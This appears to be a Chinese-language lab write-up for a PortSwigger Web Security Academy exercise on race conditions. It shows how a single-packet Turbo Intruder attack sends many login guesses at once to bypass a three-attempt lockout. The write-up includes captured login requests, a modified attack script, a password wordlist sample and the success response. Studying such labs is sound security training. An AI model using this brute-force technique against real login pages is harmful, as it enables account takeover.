Race conditions(条件竞速)为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这种情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式中出现意外行为。
常见的攻击方法如下
- 饶过只限一次的申请
- 饶过爆力破解密码限制
- 饶过多步骤流程
- 单点请求
- 饶过基于时间的机制
2.饶过爆力破解密码限制
目标网站密码输入错误三次会锁定10秒,但如果一次就同时送出大量不同密码的登入请求,可以饶过这个限制
先把以下登入请求传送到extension/turbo intruder/send to turbo intruder
########### request ###########
POST /login HTTP/2
Host: 0afb00fd046f7a6d82e620da00cf000b.web-security-academy.net
Cookie: session=51MNANP3VemzBiCc7NVsaQgR1IdDuq1J
...omit...
csrf=RQrrsXrTYltTnCOmRgRUW06cZp6kAXEE&username=carlos&password=superman
在turbo intruder中,将密码的地方换成%s如下
########### request ###########
POST /login HTTP/2
Host: 0afb00fd046f7a6d82e620da00cf000b.web-security-academy.net
Cookie: session=51MNANP3VemzBiCc7NVsaQgR1IdDuq1J
...omit...
csrf=RQrrsXrTYltTnCOmRgRUW06cZp6kAXEE&username=carlos&password=%s
并在模版中选examples/race-single-packet-attack.py,并修改如下
def queueRequests(target, wordlists):
# if the target supports HTTP/2, use engine=Engine.BURP2 to trigger the single-packet attack
# if they only support HTTP/1, use Engine.THREADED or Engine.BURP instead
# for more information, check out https://portswigger.net/research/smashing-the-state-machine
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
engine=Engine.BURP2
)
# assign the list of candidate passwords from your clipboard
passwords = wordlists.clipboard
# queue a login request using each password from the wordlist
# the 'gate' argument withholds the final part of each request until engine.openGate() is invoked
for password in passwords:
engine.queue(target.req, password, gate='1')
# once every 'race1' tagged request has been queued
# invoke engine.openGate() to send them in sync
engine.openGate('1')
def handleResponse(req, interesting):
table.add(req)
由于此脚本使用该语法passwords = wordlists.clipboard
,因此需要先去字典档将密码复制,字典档格式必须如下
123123
abc123
football
monkey
...omit...
复制后在点选turbo intruder的攻击,便可一次送出多个登入密码做验证,即便有三次限制也来不及处理突然间大量同时的请求。一但密码正确则返回如下信息
HTTP/2 302 Found
Location: /my-account?id=carlos
Set-Cookie: session=ipaou37SDt58D1igheOIc0dZhIKbj09T; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 0
其他方法可参考 Race conditions | 牛的大腦